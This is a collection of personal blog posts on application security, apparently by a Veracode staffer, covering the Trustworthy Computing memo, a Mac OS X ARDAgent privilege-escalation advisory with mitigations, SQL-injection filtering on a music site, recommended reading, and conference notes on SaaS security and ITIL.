Ten year lookback: the Trustworthy Computing memo

On the Veracode blog (where I now post from time to time), we had a retrospective on the Microsoft Trustworthy Computing memo, which had its ten year anniversary on the 15th. The retrospective spanned two posts and I’m quoted in the second:

On January 15, 2002, I was in business school and had just accepted a job offer from Microsoft. At the time it was a very different company–hip deep in the fallout from the antitrust suit and the consent decree; having just launched Windows XP; figuring out where it was going on the web (remember Passport)? And the taking of a deep breath that the Trustworthy Computing memo signaled was the biggest sign that things were different at Microsoft.

And yet not. It’s important to remember that a big part of the context of TWC was the launch of .NET and the services around it (remember Passport)? Microsoft was positioning Passport (fka Hailstorm) as the solution for the Privacy component of their Availability, Security, Privacy triad, so TWC was at least partly a positioning memo for that new technology. And it’s pretty clear that they hadn’t thought through all the implications of the stance they were taking: witness BillG’s declaration that “Visual Studio .NET is the first multi-language tool that is optimized for the creation of secure code”. While .NET may have eliminated or mitigated the security issues related to memory management that Microsoft was drowning in at the time, it didn’t do anything fundamentally different with respect to web vulnerabilities like cross-site scripting or SQL injection.

But there was one thing about the TWC memo that was different and new and that did signal a significant shift at Microsoft: Gates’ assertion that “when we face a choice between adding features and resolving security issues, we need to choose security.” As an emerging product manager, that was an important principle for me to absorb–security needs to be considered as a requirement alongside user facing features and needs to be prioritized accordingly. It’s a lesson that the rest of the industry is still learning.

To which I’ll add: it’s interesting what I blogged about this at the time and what I didn’t. As an independent developer I was very suspicious of Hailstorm (later Passport.NET) but hadn’t thought that much about its security implications.

New mix: “Blasphemous rumors”

I haven’t posted a new mix for a while, and there are a few reasons for that. So I’m jumpstarting by posting a largely unedited theme mix, based on Estaminet’s Sacrilicious mix of a while back. It’s called “Blasphemous Rumors,” and it hits songs with Old and New Testament themes as well as good old fashioned breaking of the third (or second, depending) commandment.

This will also be the last mix I post on Art of the Mix unless a few things change. The site has had some problems with SQL injection vulnerabilities, and the developer chose to fix the vulnerabilities by filtering input–which is fine, but it means that you can’t create a mix with the word “drop” in it, even in a song title (e.g. “Dropkick Me Jesus”). Tip to the developer: the best way to avoid SQL injection is by whitelisting input and parametrizing your queries, not by blacklisting.

So does anyone have a recommendation for a replacement for Art of the Mix? It should ideally support uploading playlists from iTunes.

Followup: Mac OS X ARDAgent vulnerability advice

Various parties in the Mac community have weighed in and suggested the best way to address the issue highlighted in last week’s advisory regarding an escalation of privilege vulnerability in ARDAgent. While some have suggested that enabling the remote access service may actually correct the privilege escalation, there’s been enough evidence that it doesn’t really work. And a suggestion to clear the setuid bit that allows ARDAgent to act as root appears to kill it, for at least some commentators. That leaves only leave two options:

  1. If you don’t need to have anyone remotely manage your application, just delete or archive ARDAgent.app.
  2. Restrict ARDAgent from being able to perform do shell script (as described in Martin Kou’s blog)

It would be nice if Apple just closed the hole, wouldn’t it?

While you’re at it, don’t forget to update Ruby (it’s part of the default Mac OS X installation), if you’re using it, to close a whole bunch of holes–from numeric errors to buffer overflows–in the core Ruby runtime.

And can we stop pretending that the Mac OS X platform is magically secure?

Resources for application security education

As I’ve been getting myself up to speed in learning about application security, a few resources have been extremely helpful.

A good general background on application security issues, unsurprisingly, is contained in The Art of Software Security Testing, co-authored by Veracode cofounder Chris Wysopal. The book goes beyond the basic description of classes of application security vulnerabilities into specific recommendations for testing strategies and ways to improve the software development lifecycle to avoid introducing vulnerabilities.

There have been a few pivotal written works about how certain classes of software vulnerability work. The canonical one is the Cult of the Dead Cow’s “The Tao of Windows Buffer Overflow,” written by veteran hacker Dildog. Written in a clear and easy to read (if profane) style, this work should scare the living bejeezus out of you.

There are some more business friendly summaries of other vulnerability classes available. One source for this information is Veracode’s own web site, which features clear explanations of SQL injection and cross-site scripting (XSS).

Serious new Mac OS X escalation of privilege vulnerability

Slashdot is reporting a new escalation of privilege vulnerability in Mac OS X 10.4 and 10.5. The details are a little sparse, but it appears that calling the Apple Remote Desktop Agent (ARDAgent) from AppleScript allows execution of arbitrary code with root privilege. Bad, for sure.

The mitigation is that it requires execution as the currently logged in user from the UI session, and apparently can’t be initiated over an SSH or other remote connection unless the attacker can log in as an account that is currently physically logged in on the machine. However, at a minimum it allows brute-forcing root access on any kiosk or other restricted machine that can be physically accessed. And one intelligent poster points out that all it takes is a phishing exploit that gets the user to execute the code on their own machine to open things wide up for a remote assailant–or a buffer overflow in (Safari, QuickTime, Flash, Firefox) that allows starting a shell.

Incidentally, simply disabling remote access is insufficient to prevent the attack. The ARDAgent.app must physically be removed from the machine. (For those interested, it’s usually found in /System/Library/CoreServices/RemoteManagement/.)

Apple needs to close this pronto.

Webroot on SaaS for security

The CTO of WebRoot is talking about applying Software as a Service to email and web security. It’s a good pitch, delivered to a small audience late in the afternoon.

Big thoughts:

  1. Because business-relevant content creation is shifting from “trusted providers” to semi-anonymous collaborations like wikis, blogs, and social networks, the focus is shifting away from blocking and allowing entire sites and toward figuring out how to deal with the possibility of Facebook (e.g.) as a malware vector
  2. Spam messages per business user in 2008: 42,000, based on their internal statistics.
  3. Because of #1, outgoing URL filtering no longer works (at least by itself). You have to combine anti-spyware, anti-virus, anti-phishing, and access control with high performance requirements.

The intersection of ITIL v.3 and application security

I’m at the Gartner IT Security Summit today and tomorrow (alas, I missed Bruce Sterling on the panel yesterday), and have been splitting my time between the show floor and a few of the sessions. I attended a few sessions on application security testing and on ITIL v. 3 this afternoon that sparked a few responses based on my combined security and ITIL experience.

Basically, the challenge to IT organizations who are doing any level of application management — change management of internally managed apps, purchasing COTS apps — is to figure out how to integrate application security into their software development and purchasing lifecycles. The two concrete recommendations that jumped out for me were:

  1. Don’t treat purchased software differently, from a security perspective, than you treat internally developed software. Hold both to the same standards and demand the same security certification from both. While this has traditionally been harder for COTS software, where source code is usually unavailable, binary analysis techniques such as those provided by my firm enable some level of consistency across these two categories.
  2. Bake security into your service management lifecycle. From design to transition to continuous improvement, security should be architected in and designed into the process. One way to consider how security can dovetail with ITIL is considering the role of security audits, whether binary or otherwise, as part of change and release management criteria. While secure development practices and source code tools should certainly be part of the SDLC process, release criteria should include security testing as well as functional testing requirements. Again, automated scanning can greatly assist with this process.